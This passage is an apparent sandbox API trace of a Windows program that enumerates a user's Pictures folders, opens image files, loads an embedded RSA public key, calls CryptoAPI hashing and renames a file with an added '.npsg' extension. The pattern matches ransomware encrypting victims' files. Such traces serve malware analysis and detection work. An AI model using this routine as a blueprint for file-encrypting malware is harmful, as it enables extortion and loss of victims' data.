lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.367] CloseHandle (hObject=0x644) returned 1 [0239.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0239.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b89cd0 [0239.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393a30 | out: hHeap=0x620000) returned 1 [0239.369] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\rJ-XhzoDCCMB9\\bPdz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\rj-xhzodccmb9\\bpdz.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\rJ-XhzoDCCMB9\\bPdz.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\rj-xhzodccmb9\\bpdz.jpg.npsg")) returned 1 [0239.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.370] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.371] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73de60b0, ftCreationTime.dwHighDateTime=0x1d5badd, ftLastAccessTime.dwLowDateTime=0x4f5bfaf0, ftLastAccessTime.dwHighDateTime=0x1d5b820, ftLastWriteTime.dwLowDateTime=0x4f5bfaf0, ftLastWriteTime.dwHighDateTime=0x1d5b820, nFileSizeHigh=0x0, nFileSizeLow=0x2272, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bPdz.jpg", cAlternateFileName="")) returned 0 [0239.371] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0239.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0239.371] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c43c0 [0239.371] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0239.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0239.377] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\") returned="PzoYP\\" [0239.377] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\") returned="NkpM1m8S\\" [0239.377] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0239.377] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.377] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.377] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.377] PathFindFileNameW (pszPath="") returned="" [0239.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63f63dc0, ftCreationTime.dwHighDateTime=0x1d5b63d, ftLastAccessTime.dwLowDateTime=0x4e930650, ftLastAccessTime.dwHighDateTime=0x1d5bbe9, ftLastWriteTime.dwLowDateTime=0x4e930650, ftLastWriteTime.dwHighDateTime=0x1d5bbe9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0239.379] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63f63dc0, ftCreationTime.dwHighDateTime=0x1d5b63d, ftLastAccessTime.dwLowDateTime=0x4e930650, ftLastAccessTime.dwHighDateTime=0x1d5bbe9, ftLastWriteTime.dwLowDateTime=0x4e930650, ftLastWriteTime.dwHighDateTime=0x1d5bbe9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.379] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ed5e30, ftCreationTime.dwHighDateTime=0x1d5b8c8, ftLastAccessTime.dwLowDateTime=0xdfce43f0, ftLastAccessTime.dwHighDateTime=0x1d5c373, ftLastWriteTime.dwLowDateTime=0xdfce43f0, ftLastWriteTime.dwHighDateTime=0x1d5c373, nFileSizeHigh=0x0, nFileSizeLow=0x6ef1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Jb4drQ.png", cAlternateFileName="")) returned 1 [0239.379] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\1Jb4drQ.png") returned=".png" [0239.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\1Jb4drQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\1jb4drq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.380] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=28401) returned 1 [0239.380] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.383] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x6ecb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.383] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.384] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x6ef1, lpOverlapped=0x0) returned 1 [0239.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.385] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.385] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.386] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.386] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.386] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.386] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 